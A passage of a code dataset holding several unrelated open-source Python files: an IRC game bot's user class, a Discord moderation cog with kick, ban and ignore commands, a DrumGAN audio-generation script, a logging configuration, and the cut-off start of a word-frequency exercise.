lower(host, casemapping=\"ascii\")))\n\n def prefers_notice(self):\n return self.lower().account in db.PREFER_NOTICE\n\n def get_pingif_count(self):\n return db.PING_IF_PREFS.get(self.lower().account, 0)\n\n def set_pingif_count(self, value, old=None):\n temp = self.lower()\n\n if not value:\n if temp.account in db.PING_IF_PREFS:\n del db.PING_IF_PREFS[temp.account]\n db.set_pingif(0, temp.account)\n if old is not None:\n if old in db.PING_IF_NUMS:\n db.PING_IF_NUMS[old].discard(temp.account)\n else:\n if temp.account:\n db.PING_IF_PREFS[temp.account] = value\n db.set_pingif(value, temp.account)\n if value not in db.PING_IF_NUMS:\n db.PING_IF_NUMS[value] = set()\n 
db.PING_IF_NUMS[value].add(temp.account)\n if old is not None:\n if old in db.PING_IF_NUMS:\n db.PING_IF_NUMS[old].discard(temp.account)\n\n def wants_deadchat(self):\n return self.lower().account not in db.DEADCHAT_PREFS\n\n def stasis_count(self):\n \"\"\"Return the number of games the user is in stasis for.\"\"\"\n return db.STASISED.get(self.lower().account, 0)\n\n def update_account_data(self, command: str, callback: Callable):\n \"\"\"Refresh stale account data on networks that don't support certain features.\n\n :param command: Command name that prompted the call to update_account_data.\n Used to handle cases where the user executes multiple commands before\n account data can be updated, so they can all be queued. If the same command\n is given multiple times, we honor the most recent one given. The command\n has a unique suffix so that distinct commands that share names (e.g. wolf kill\n and vg kill) do not cause collisions.\n :param callback: Callback to execute when account data is fully updated,\n passed in the updated user with an accurate account\n \"\"\"\n\n # Nothing to update for fake nicks\n if self.is_fake:\n callback(self)\n return\n\n if self.account and Features.get(\"account-notify\", False):\n # account-notify is enabled, so we're already up to date on our account name\n callback(self)\n return\n\n if self.account and self.account_timestamp > time.time() - 900:\n # account data is less than 15 minutes old, use existing data instead of refreshing\n callback(self)\n return\n\n evt = Event(\"update_account_data\", {})\n if not evt.dispatch(self):\n new_user = get(self.nick, self.ident, self.host, allow_ghosts=True)\n callback(new_user)\n return\n\n if self not in _pending_account_updates:\n _pending_account_updates[self] = CheckedDict(\"users.User.update_account_data\")\n\n _pending_account_updates[self][command] = callback\n\n if len(_pending_account_updates[self].keys()) > 1:\n # already have a pending WHO/WHOIS for this user, don't send multiple to the server to avoid hitting\n # rate limits (if we are ratelimited, that can be handled by re-sending the request at a lower layer)\n return\n\n if Features.get(\"WHOX\", False):\n # A WHOX query performs less network noise than WHOIS, so use that if available\n self.who()\n else:\n # Fallback to WHOIS\n self.client.send(\"WHOIS {0}\".format(self))\n\n @property\n def nick(self): # name should be the same as nick (for length calculation)\n return self.name\n\n @nick.setter\n def nick(self, value):\n new = User(self.client, value, self.ident, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def ident(self):\n return self._ident\n\n @ident.setter\n def ident(self, value):\n new = User(self.client, self.nick, value, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def host(self):\n return self._host\n\n @host.setter\n def host(self, value):\n new = User(self.client, self.nick, self.ident, value, self.account)\n self.swap(new, same_user=True)\n\n @property\n def account(self): # automatically converts \"0\" and \"*\" to None\n return self._account\n\n @account.setter\n def account(self, value):\n if value in (\"0\", \"*\"):\n value = NotLoggedIn\n new = User(self.client, self.nick, self.ident, self.host, value)\n new.account_timestamp = time.time()\n self.swap(new, same_user=True)\n\n @property\n def rawnick(self):\n if self.nick is None or self.ident is None or self.host is None:\n return None\n return \"{self.nick}!{self.ident}@{self.host}\".format(self=self)\n\n 
@rawnick.setter\n def rawnick(self, value):\n nick, ident, host = parse_rawnick(value)\n new = User(self.client, nick, ident, host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def disconnected(self):\n return self in _ghosts\n\n @disconnected.setter\n def disconnected(self, value):\n if value:\n _ghosts.add(self)\n else:\n _ghosts.discard(self)\n # ensure dangling users aren't left around in our tracking var\n if not self.channels:\n _users.discard(self)\n\n @property\n def game_state(self):\n # There's only ever one game for now, but if/when the bot supports\n # running multiple games simultaneously, we can use this to fetch\n # which game the user is currently playing in (assuming that a\n # user can only belong to one game at a time)\n from src import channels\n return channels.Main.game_state\n\nclass FakeUser(User):\n\n is_fake = True\n\n def __hash__(self):\n return hash(self.nick)\n\n def __format__(self, format_spec):\n if format_spec in (\"for_tb\", \"for_tb_verbose\") and self.nick.startswith(\"@\"):\n # fakes starting with @ are used internally for various purposes (such as @WolvesAgree@)\n # so it'd be good to keep that around when debugging in tracebacks\n return \"{self.__class__.__name__}({self.nick!r})\".format(self=self)\n return super().__format__(format_spec)\n\n @classmethod\n def from_nick(cls, nick):\n return FakeUser(None, nick, None, None, None)\n\n @property\n def nick(self):\n return self.name\n\n @nick.setter\n def nick(self, value):\n raise ValueError(\"may not change the nick of a fake user\")\n\n @property\n def rawnick(self):\n return self.nick # we don't have a raw nick\n\n @rawnick.setter\n def rawnick(self, value):\n raise ValueError(\"may not change the raw nick of a fake user\")\n\nclass BotUser(User): # TODO: change all the 'if x is Bot' for 'if isinstance(x, BotUser)'\n\n def __init__(self, cli, nick, ident, host, account):\n if not self._initialized:\n self.modes = set()\n super().__init__(cli, nick, ident, host, account)\n\n def change_nick(self, nick=None):\n if nick is None:\n nick = self.nick\n self.client.send(\"NICK\", nick)\n\n @property\n def nick(self): # name should be the same as nick (for length calculation)\n return self.name\n\n @nick.setter\n def nick(self, value):\n self.client.nickname = value\n new = BotUser(self.client, value, self.ident, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def ident(self):\n return self._ident\n\n @ident.setter\n def ident(self, value):\n self.client.ident = value\n new = BotUser(self.client, self.nick, value, self.host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def host(self):\n return self._host\n\n @host.setter\n def host(self, value):\n self.client.hostmask = value\n new = BotUser(self.client, self.nick, self.ident, value, self.account)\n self.swap(new, same_user=True)\n\n @property\n def account(self): # automatically converts \"0\" and \"*\" to None\n return self._account\n\n @account.setter\n def account(self, value):\n if value in (\"0\", \"*\"):\n value = NotLoggedIn\n new = BotUser(self.client, self.nick, self.ident, self.host, value)\n self.swap(new, same_user=True)\n\n @property\n def rawnick(self):\n if self.nick is None or self.ident is None or self.host is None:\n return None\n return \"{self.nick}!{self.ident}@{self.host}\".format(self=self)\n\n @rawnick.setter\n def rawnick(self, value):\n nick, ident, host = parse_rawnick(value)\n self.client.nickname = nick\n self.client.ident = ident\n self.client.hostmask = host\n new 
= BotUser(self.client, nick, ident, host, self.account)\n self.swap(new, same_user=True)\n\n @property\n def disconnected(self):\n return False\n\n @disconnected.setter\n def disconnected(self, value):\n pass # no-op\n\n @property\n def game_state(self):\n # PMs to the bot should use the source's game state for disambiguation\n return None\n","repo_name":"lykoss/lykos","sub_path":"src/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":30680,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"21"} +{"seq_id":"42576386876","text":"import asyncio, discord, re, random\r\nfrom operator import itemgetter\r\nfrom discord.ext import commands\r\nfrom Cogs import Utils, DisplayName, Message, PickList\r\n\r\ndef setup(bot):\r\n\t# Add the bot and deps\r\n\tsettings = bot.get_cog(\"Settings\")\r\n\tbot.add_cog(BotAdmin(bot, settings))\r\n\r\nclass BotAdmin(commands.Cog):\r\n\r\n\t# Init with the bot reference, and a reference to the settings var\r\n\tdef __init__(self, bot, settings):\r\n\t\tself.bot = bot\r\n\t\tself.settings = settings\r\n\t\tself.dregex = re.compile(r\"(?i)(discord(\\.gg|app\\.com)\\/)(?!attachments)([^\\s]+)\")\r\n\t\tself.mention_re = re.compile(r\"[0-9]{17,21}\")\r\n\t\tglobal Utils, DisplayName\r\n\t\tUtils = self.bot.get_cog(\"Utils\")\r\n\t\tDisplayName = self.bot.get_cog(\"DisplayName\")\r\n\r\n\tasync def message(self, message):\r\n\t\t# Check for discord invite links and remove them if found - per server settings\r\n\t\tif not self.dregex.search(message.content): return None # No invite in the passed message - nothing to do\r\n\t\t# Got an invite - let's see if we care\r\n\t\tif not self.settings.getServerStat(message.guild,\"RemoveInviteLinks\",False): return None # We don't care\r\n\t\t# We *do* care, let's see if the author is admin/bot-admin as they'd have power to post invites\r\n\t\tctx = await self.bot.get_context(message)\r\n\t\tif Utils.is_bot_admin(ctx): return None # We are immune!\r\n\t\t# At this point - we need to delete the message\r\n\t\treturn { 'Ignore' : True, 'Delete' : True}\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def removeinvitelinks(self, ctx, *, yes_no = None):\r\n\t\t\"\"\"Enables/Disables auto-deleting discord invite links in chat (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\tawait ctx.send(Utils.yes_no_setting(ctx,\"Remove discord invite links\",\"RemoveInviteLinks\",yes_no))\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def setuserparts(self, ctx, member : discord.Member = None, *, parts : str = None):\r\n\t\t\"\"\"Set another user's parts list (owner only).\"\"\"\r\n\t\t# Only allow owner\r\n\t\tisOwner = self.settings.isOwner(ctx.author)\r\n\t\tif isOwner == None:\r\n\t\t\tmsg = 'I have not been claimed, *yet*.'\r\n\t\t\treturn await ctx.send(msg)\r\n\t\telif isOwner == False:\r\n\t\t\tmsg = 'You are not the *true* owner of me. 
Only the rightful owner can use this command.'\r\n\t\t\treturn await ctx.send(msg)\r\n\t\t\t\r\n\t\tif member == None:\r\n\t\t\tmsg = 'Usage: `{}setuserparts [member] \"[parts text]\"`'.format(ctx.prefix)\r\n\t\t\treturn await ctx.send(msg)\r\n\r\n\t\tif type(member) is str:\r\n\t\t\ttry:\r\n\t\t\t\tmember = discord.utils.get(ctx.guild.members, name=member)\r\n\t\t\texcept:\r\n\t\t\t\treturn await ctx.send(\"That member does not exist\")\r\n\r\n\t\tif not parts:\r\n\t\t\tparts = \"\"\r\n\t\t\t\r\n\t\tself.settings.setGlobalUserStat(member, \"Parts\", parts)\r\n\t\tmsg = '*{}\\'s* parts have been set to:\\n{}'.format(DisplayName.name(member), parts)\r\n\t\tawait ctx.send(Utils.suppressed(ctx,msg))\r\n\t\t\r\n\t@setuserparts.error\r\n\tasync def setuserparts_error(self, error, ctx):\r\n\t\t# do stuff\r\n\t\tmsg = 'setuserparts Error: {}'.format(error)\r\n\t\tawait ctx.send(msg)\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def ignore(self, ctx, *, member = None):\r\n\t\t\"\"\"Adds a member to the bot's \"ignore\" list (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\t\t\r\n\t\tif member == None:\r\n\t\t\tmsg = 'Usage: `{}ignore [member]`'.format(ctx.prefix)\r\n\t\t\treturn await ctx.send(msg)\r\n\r\n\t\tif type(member) is str:\r\n\t\t\tmemberName = member\r\n\t\t\tmember = DisplayName.memberForName(memberName, ctx.guild)\r\n\t\t\tif not member:\r\n\t\t\t\tmsg = 'I couldn\\'t find *{}*...'.format(memberName)\r\n\t\t\t\treturn await ctx.send(Utils.suppressed(ctx,msg))\r\n\r\n\t\tignoreList = self.settings.getServerStat(ctx.guild, \"IgnoredUsers\")\r\n\r\n\t\tfor user in ignoreList:\r\n\t\t\tif str(member.id) == str(user[\"ID\"]):\r\n\t\t\t\t# Found our user - already ignored\r\n\t\t\t\treturn await ctx.send('*{}* is already being ignored.'.format(DisplayName.name(member)))\r\n\t\t# Let's ignore someone\r\n\t\tignoreList.append({ \"Name\" : member.name, \"ID\" : member.id })\r\n\t\tself.settings.setServerStat(ctx.guild, \"IgnoredUsers\", ignoreList)\r\n\r\n\t\tawait ctx.send('*{}* is now being ignored.'.format(DisplayName.name(member)))\r\n\t\t\r\n\t@ignore.error\r\n\tasync def ignore_error(self, error, ctx):\r\n\t\t# do stuff\r\n\t\tmsg = 'ignore Error: {}'.format(error)\r\n\t\tawait ctx.send(msg)\r\n\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def listen(self, ctx, *, member = None):\r\n\t\t\"\"\"Removes a member from the bot's \"ignore\" list (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\t\t\r\n\t\tif member == None:\r\n\t\t\treturn await ctx.send('Usage: `{}listen [member]`'.format(ctx.prefix))\r\n\r\n\t\tif type(member) is str:\r\n\t\t\tmemberName = member\r\n\t\t\tmember = DisplayName.memberForName(memberName, ctx.guild)\r\n\t\t\tif not member:\r\n\t\t\t\tmsg = 'I couldn\\'t find *{}*...'.format(memberName)\r\n\t\t\t\treturn await ctx.send(Utils.suppressed(ctx,msg))\r\n\r\n\t\tignoreList = self.settings.getServerStat(ctx.guild, \"IgnoredUsers\")\r\n\r\n\t\tfor user in ignoreList:\r\n\t\t\tif str(member.id) == str(user[\"ID\"]):\r\n\t\t\t\t# Found our user - already ignored\r\n\t\t\t\tignoreList.remove(user)\r\n\t\t\t\tself.settings.setServerStat(ctx.guild, \"IgnoredUsers\", ignoreList)\r\n\t\t\t\treturn await ctx.send(\"*{}* is no longer being ignored.\".format(DisplayName.name(member)))\r\n\r\n\t\tawait ctx.send('*{}* wasn\\'t being ignored...'.format(DisplayName.name(member)))\r\n\t\t\r\n\t@listen.error\r\n\tasync def listen_error(self, error, ctx):\r\n\t\t# do stuff\r\n\t\tmsg = 
'listen Error: {}'.format(error)\r\n\t\tawait ctx.send(msg)\r\n\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def ignored(self, ctx):\r\n\t\t\"\"\"Lists the users currently being ignored.\"\"\"\r\n\t\tignoreArray = self.settings.getServerStat(ctx.guild, \"IgnoredUsers\")\r\n\t\tpromoSorted = sorted(ignoreArray, key=itemgetter('Name'))\r\n\t\tif not len(promoSorted):\r\n\t\t\treturn await ctx.send(\"I'm not currently ignoring anyone.\")\r\n\t\tignored = [\"*{}*\".format(DisplayName.name(ctx.guild.get_member(int(x[\"ID\"])))) for x in promoSorted if ctx.guild.get_member(int(x[\"ID\"]))]\r\n\t\tawait ctx.send(\"Currently Ignored Users:\\n{}\".format(\"\\n\".join(ignored)))\r\n\r\n\t\r\n\tasync def kick_ban(self, ctx, members_and_reason = None, command_name = \"kick\"):\r\n\t\t# Helper method to handle the lifting for kick and ban\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\tif not members_and_reason:\r\n\t\t\treturn await ctx.send('Usage: `{}{} [space delimited member mention/id] [reason]`'.format(ctx.prefix, command_name))\r\n\t\t# Force a mention - we don't want any ambiguity\r\n\t\targs = members_and_reason.split()\r\n\t\t# Get our list of targets\r\n\t\ttargets = []\r\n\t\tmissed = []\r\n\t\tunable = []\r\n\t\treason = \"\"\r\n\t\tdays = self.settings.getServerStat(ctx.guild,\"BanMessageRemoveDays\",1) if command_name == \"ban\" else None\r\n\t\ttry: days = int(days)\r\n\t\texcept: days = None\r\n\t\tfooter = \"Message Removal: {:,} day{}\".format(days,\"\" if days==1 else \"s\") if command_name == \"ban\" else None\r\n\t\tfor index,item in enumerate(args):\r\n\t\t\tif self.mention_re.search(item): # Check if it's a mention\r\n\t\t\t\t# Resolve the member\r\n\t\t\t\tmem_id = int(re.sub(r'\\W+', '', item))\r\n\t\t\t\tmember = ctx.guild.get_member(mem_id)\r\n\t\t\t\tif member is None and command_name in (\"ban\",\"unban\"): # Didn't get a valid member, let's allow a pre-ban/unban if we can resolve them\r\n\t\t\t\t\ttry: member = await self.bot.fetch_user(mem_id)\r\n\t\t\t\t\texcept: pass\r\n\t\t\t\t# If we have an invalid mention, save it to report later\r\n\t\t\t\tif member is None:\r\n\t\t\t\t\tmissed.append(str(mem_id))\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t# Let's check if we have a valid member and make sure it's not:\r\n\t\t\t\t# 1. The bot, 2. The command caller, 3. 
Another bot-admin/admin\r\n\t\t\t\tif isinstance(member, discord.Member) and (member.id == self.bot.user.id or member.id == ctx.author.id or Utils.is_bot_admin(ctx,member)):\r\n\t\t\t\t\tunable.append(member.mention)\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif not member in targets: targets.append(member) # Only add them if we don't already have them\r\n\t\t\telse:\r\n\t\t\t\t# Check if we're banning - and if so, check the rest of the args for `-r=#`\r\n\t\t\t\t# then apply that override and remove from the reason\r\n\t\t\t\tif command_name == \"ban\":\r\n\t\t\t\t\tfor i,x in enumerate(args[index:]):\r\n\t\t\t\t\t\tif x.lower().startswith(\"-r=\"):\r\n\t\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\t\tdays = int(x.split(\"=\")[-1])\r\n\t\t\t\t\t\t\t\tassert 0<=days<8\r\n\t\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\targs.pop(index+i)\r\n\t\t\t\t\t\t\tfooter=\"Message Removal Override: {:,} day{}\".format(days,\"\" if days==1 else \"s\")\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t# Bail if we don't have any args left for a reason\r\n\t\t\t\t\tif index >= len(args): break\r\n\t\t\t\t# Not a mention - must be the reason, dump the rest of the items into a string\r\n\t\t\t\t# separated by a space\r\n\t\t\t\treason = \" \".join(args[index:])\r\n\t\t\t\tbreak\r\n\t\treason = reason if len(reason) else \"No reason provided.\"\r\n\t\tif not len(targets):\r\n\t\t\tmsg = \"**With reason:**\\n\\n{}{}{}\".format(\r\n\t\t\t\treason,\r\n\t\t\t\t\"\" if not len(missed) else \"\\n\\n**Unmatched ID{}:**\\n\\n{}\".format(\"\" if len(missed) == 1 else \"s\", \"\\n\".join(missed)),\r\n\t\t\t\t\"\" if not len(unable) else \"\\n\\n**Unable to {}:**\\n\\n{}\".format(command_name,\"\\n\".join(unable))\r\n\t\t\t)\r\n\t\t\treturn await Message.EmbedText(title=\"No valid members passed!\",description=msg,color=ctx.author,footer=footer).send(ctx)\r\n\t\t# We should have a list of targets, and the reason - let's list them for confirmation\r\n\t\t# then generate a 4-digit confirmation code that the original requestor needs to confirm\r\n\t\t# in order to follow through\r\n\t\tconfirmation_code = \"\".join([str(random.randint(0,9)) for x in range(4)])\r\n\t\tmsg = \"**To {} the following member{}:**\\n\\n{}\\n\\n**With reason:**\\n\\n\\\"{}\\\"\\n\\n**Please type:**\\n\\n`{}`{}{}\".format(\r\n\t\t\tcommand_name,\r\n\t\t\t\"\" if len(targets) == 1 else \"s\",\r\n\t\t\t\"\\n\".join([x.name+\"#\"+x.discriminator for x in targets]),\r\n\t\t\treason if len(reason) else \"None\",\r\n\t\t\tconfirmation_code,\r\n\t\t\t\"\" if not len(missed) else \"\\n\\n**Unmatched ID{}:**\\n\\n{}\".format(\"\" if len(missed) == 1 else \"s\", \"\\n\".join(missed)),\r\n\t\t\t\"\" if not len(unable) else \"\\n\\n**Unable to {}:**\\n\\n{}\".format(command_name,\"\\n\".join(unable))\r\n\t\t\t)\r\n\t\tconfirmation_message = await Message.EmbedText(title=\"{} Confirmation\".format(command_name.capitalize()),description=msg,color=ctx.author,footer=footer).send(ctx)\r\n\t\tdef check_confirmation(message):\r\n\t\t\treturn message.channel == ctx.channel and ctx.author == message.author # Just making sure it's the same user/channel\r\n\t\ttry: confirmation_user = await self.bot.wait_for('message', timeout=60, check=check_confirmation)\r\n\t\texcept: confirmation_user = \"\"\r\n\t\t# Delete the confirmation message\r\n\t\tawait confirmation_message.delete()\r\n\t\t# Verify the confirmation\r\n\t\tif not confirmation_user.content == confirmation_code: return await ctx.send(\"{} cancelled!\".format(command_name.capitalize()))\r\n\t\t# We got the 
authorization!\r\n\t\tmessage = await Message.EmbedText(title=\"{}ing...\".format(\"Bann\" if command_name == \"ban\" else \"Unbann\" if command_name == \"unban\" else \"Kick\"),color=ctx.author,footer=footer).send(ctx)\r\n\t\tcanned = []\r\n\t\tcant = []\r\n\t\tcommand = {\"ban\":ctx.guild.ban,\"kick\":ctx.guild.kick,\"unban\":ctx.guild.unban}.get(command_name.lower(),ctx.guild.kick)\r\n\t\tfor target in targets:\r\n\t\t\ttry:\r\n\t\t\t\targs = {\"reason\":\"{}#{}: {}\".format(ctx.author.name,ctx.author.discriminator,reason)}\r\n\t\t\t\tif days is not None: args[\"delete_message_days\"] = days\r\n\t\t\t\tawait command(target,**args)\r\n\t\t\t\tcanned.append(target)\r\n\t\t\texcept: cant.append(target)\r\n\t\tmsg = \"\"\r\n\t\tif len(canned):\r\n\t\t\tmsg += \"**I was ABLE to {}:**\\n\\n{}\\n\\n\".format(command_name,\"\\n\".join([x.name+\"#\"+x.discriminator for x in canned]))\r\n\t\tif len(cant):\r\n\t\t\tmsg += \"**I was UNABLE to {}:**\\n\\n{}\\n\\n\".format(command_name,\"\\n\".join([x.name+\"#\"+x.discriminator for x in cant]))\r\n\t\tawait Message.EmbedText(title=\"{} Results\".format(command_name.capitalize()),description=msg,footer=footer).edit(ctx,message)\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def kick(self, ctx, *, members = None, reason = None):\r\n\t\t\"\"\"Kicks the passed members for the specified reason.\r\n\t\tAll kick targets must be mentions or ids to avoid ambiguity (bot-admin only).\r\n\t\t\r\n\t\teg: $kick @user1#1234 @user2#5678 @user3#9012 for spamming\"\"\"\r\n\t\tawait self.kick_ban(ctx,members,\"kick\")\r\n\t\t\r\n\t\t\r\n\t@commands.command(pass_context=True)\r\n\tasync def ban(self, ctx, *, members = None, reason = None):\r\n\t\t\"\"\"Bans the passed members for the specified reason.\r\n\t\tAll ban targets must be mentions or ids to avoid ambiguity (bot-admin only).\r\n\t\t\r\n\t\teg: $ban @user1#1234 @user2#5678 @user3#9012 for spamming\r\n\t\t\r\n\t\tCan take '-r=#' within the reason to specify the number of days to remove the banned users' messages.\r\n\t\tThis is limited to 0-7 days, and will override the value set by the rembanmessages command.\r\n\t\t\r\n\t\teg: $ban @user1#1234 @user2#5678 @user3#9012 for spamming -r=5\"\"\"\r\n\t\tawait self.kick_ban(ctx,members,\"ban\")\r\n\r\n\t@commands.command(pass_context=True)\r\n\tasync def unban(self, ctx, *, members = None, reason = None):\r\n\t\t\"\"\"Unbans the passed members for the specified reason.\r\n\t\tAll unban targets must be mentions or ids to avoid ambiguity (bot-admin only).\r\n\t\t\r\n\t\teg: $unban @user1#1234 @user2#5678 @user3#9012 because we're nice\"\"\"\r\n\t\tawait self.kick_ban(ctx,members,\"unban\")\r\n\r\n\t@commands.command()\r\n\tasync def banned(self, ctx, *, user_id = None):\r\n\t\t\"\"\"Queries the guild's ban list for the passed user id and responds with whether they've been banned and the reason.\r\n\t\tUse with no user_id to show all bans and reasons (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\r\n\t\ttry: all_bans = await ctx.guild.bans()\r\n\t\texcept: return await ctx.send(\"I couldn't get the ban list :(\")\r\n\t\t\r\n\t\tif not len(all_bans): return await Message.EmbedText(title=\"Ban List\",description=\"No bans found\",color=ctx.author).send(ctx)\r\n\r\n\t\torig_user = user_id\r\n\t\ttry: user_id = int(user_id) if user_id != None else None\r\n\t\texcept: user_id = -1 # Use -1 to indicate unresolved\r\n\r\n\t\tentries = []\r\n\t\tfor ban in all_bans:\r\n\t\t\tentries.append({\"name\":\"{}#{} 
({})\".format(ban.user.name,ban.user.discriminator,ban.user.id),\"value\":ban.reason if ban.reason else \"No reason provided\"})\r\n\t\t\tif user_id != None and user_id == ban.user.id:\r\n\t\t\t\t# Got a match - display it\r\n\t\t\t\treturn await Message.Embed(\r\n\t\t\t\t\ttitle=\"Ban Found For {}\".format(user_id),\r\n\t\t\t\t\tfields=[entries[-1]], # Send the last found entry\r\n\t\t\t\t\tcolor=ctx.author\r\n\t\t\t\t).send(ctx)\r\n\t\tif orig_user is None:\r\n\t\t\t# Just passed None - show the whole ban list\r\n\t\t\treturn await PickList.PagePicker(title=\"Ban List ({:,} total)\".format(len(entries)),list=entries,ctx=ctx).pick()\r\n\t\t# We searched for something and didn't find it\r\n\t\treturn await Message.Embed(title=\"Ban List ({:,} total)\".format(len(entries)),description=\"No match found for '{}'.\".format(orig_user),color=ctx.author).send(ctx)\r\n\r\n\t@commands.command()\r\n\tasync def rembanmessages(self, ctx, number_of_days = None):\r\n\t\t\"\"\"Gets or sets the default number of days worth of messages to remove when banning a user. Must be between 0-7 and uses a default of 1 (bot-admin only).\"\"\"\r\n\t\tif not await Utils.is_bot_admin_reply(ctx): return\r\n\t\tif number_of_days == None: # No setting passed, just output the current\r\n\t\t\tdays = self.settings.getServerStat(ctx.guild,\"BanMessageRemoveDays\",1)\r\n\t\t\treturn await ctx.send(\"Banning a user will remove {:,} day{} worth of messages.\".format(days,\"\" if days==1 else \"s\"))\r\n\t\t# Try to cast the days as an int - and ensure they're between 0 and 7\r\n\t\ttry:\r\n\t\t\tdays = int(number_of_days)\r\n\t\t\tassert 0<=days<8\r\n\t\texcept:\r\n\t\t\treturn await ctx.send(\"Number of days must be an integer between 0 and 7!\")\r\n\t\t# At this point, we should have the default number of days - let's tell the user!\r\n\t\tself.settings.setServerStat(ctx.guild,\"BanMessageRemoveDays\",days)\r\n\t\treturn await ctx.send(\"Banning a user will now remove {:,} day{} worth of messages.\".format(days,\"\" if days==1 else \"s\"))\r\n","repo_name":"scottoss/corpbot.py","sub_path":"Cogs/BotAdmin.py","file_name":"BotAdmin.py","file_ext":"py","file_size_in_byte":15573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2827085572","text":"import os\nimport torch\nimport ipdb\nimport random\n\nfrom datetime import datetime\nfrom .generation_tests import *\n\nfrom utils.utils import mkdir_in_path, load_model_checkp, saveAudioBatch, get_device\nfrom .generation_tests import StyleGEvaluationManager\nfrom data.preprocessing import AudioProcessor\nfrom data.loaders import get_data_loader\n\n\ndef radial_interpolation(z_dim: int, n_samples: int=10):\n fixed_point = torch.randn(z_dim)\n fixed_point = fixed_point / fixed_point.norm()\n z_batch = torch.zeros(n_samples, z_dim)\n\n t = torch.linspace(0.2, 8.0, n_samples)\n for k in range(n_samples):\n z_batch[k] = fixed_point * t[k]\n return z_batch\n\n\ndef generate(parser):\n args = parser.parse_args()\n device = get_device()\n\n model, config, model_name = load_model_checkp(**vars(args))\n latentDim = model.config.noiseVectorDim\n transform_config = config['transform_config']\n loader_config = config['loader_config']\n # We load a dummy data loader for post-processing\n processor = AudioProcessor(**transform_config)\n\n dbname = loader_config['dbname']\n loader_config[\"criteria\"][\"size\"] = 1000\n loader = get_data_loader(dbname)(\n name=dbname + '_' + transform_config['transform'],\n preprocessing=processor, 
**loader_config)\n\n\n    label = torch.Tensor(random.sample(loader.metadata, k=1))\n\n    labels, _ = model.buildNoiseData(1, inputLabels=label, skipAtts=True)\n    z = labels.repeat(args.n_gen, 1)\n\n    z_noise = radial_interpolation(latentDim, args.n_gen)\n\n    z[:, :latentDim] = z_noise\n\n    gnet = model.getOriginalG()\n    gnet.eval()\n    with torch.no_grad():\n        out = gnet(z.to(device)).detach().cpu()\n\n    audio_out = loader.postprocess(out)\n\n    # Create output evaluation dir\n    output_dir = mkdir_in_path(args.dir, f\"generation_tests\")\n    output_dir = mkdir_in_path(output_dir, model_name)\n    output_dir = mkdir_in_path(output_dir, \"radial_interpolation\")\n    output_dir = mkdir_in_path(output_dir, datetime.now().strftime('%Y-%m-%d %H:%M'))\n\n    saveAudioBatch(audio_out,\n                   path=output_dir,\n                   basename='test_radial_interpolation', \n                   sr=config[\"transform_config\"][\"sample_rate\"])\n    print(\"FINISHED!\\n\")","repo_name":"SonyCSLParis/DrumGAN","sub_path":"evaluation/gen_tests/radial_interpolation.py","file_name":"radial_interpolation.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"21"} +{"seq_id":"73630615092","text":"################################################################\n# USAGE:\n# from core.logging_config import app_logger\n################################################################\n\n\nimport logging\nimport logging.config  # required for logging.config.dictConfig below\nimport sys\nfrom logging.handlers import RotatingFileHandler\n\n# Define the basic configuration for logging\nLOGGING_CONFIG = {\n    \"version\": 1,\n    \"disable_existing_loggers\": False,\n    \"formatters\": {\n        \"default\": {\n            \"format\": \"{asctime} - {levelname} - {name} - {message}\",\n            \"style\": \"{\",\n        },\n    },\n    \"handlers\": {\n        \"console\": {\n            \"class\": \"logging.StreamHandler\",\n            \"level\": \"DEBUG\",\n            \"formatter\": \"default\",\n            \"stream\": \"ext://sys.stdout\",\n        },\n        \"file\": {\n            \"class\": \"logging.handlers.RotatingFileHandler\",\n            \"level\": \"INFO\",\n            \"formatter\": \"default\",\n            \"filename\": \"logs/app.log\",\n            \"maxBytes\": 10485760,  # 10MB\n            \"backupCount\": 3,\n            \"encoding\": \"utf8\",\n        },\n    },\n    \"loggers\": {\n        \"uvicorn\": {\n            \"handlers\": [\"console\"],\n            \"level\": \"INFO\",\n        },\n        \"fastapi\": {\n            \"handlers\": [\"console\", \"file\"],\n            \"level\": \"INFO\",\n        },\n        \"app\": {\n            \"handlers\": [\"console\", \"file\"],\n            \"level\": \"DEBUG\",\n        },\n    },\n}\n\n# Apply the logging configuration\nlogging.config.dictConfig(LOGGING_CONFIG)\n\n# Create a custom logger for the application\napp_logger = logging.getLogger(\"app\")\n","repo_name":"llarse/RockPaperScissors_API","sub_path":"app/core/logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73526709491","text":"# Write a function named frequency_dictionary that takes a list of elements named words as a parameter.\n# The function should return a dictionary containing the frequency of each element in words.\n\n# Write your frequency_dictionary function here:\ndef frequency_dictionary(words):\n  # Create empty dictionary\n  frequency = {}\n  # Iterate through words\n  for word in words:\n    # Add key value pair of word and its appearances in words\n    frequency[word] = words.count(word)\n  # Return frequency\n  return frequency\n  \n# Uncomment these function calls to 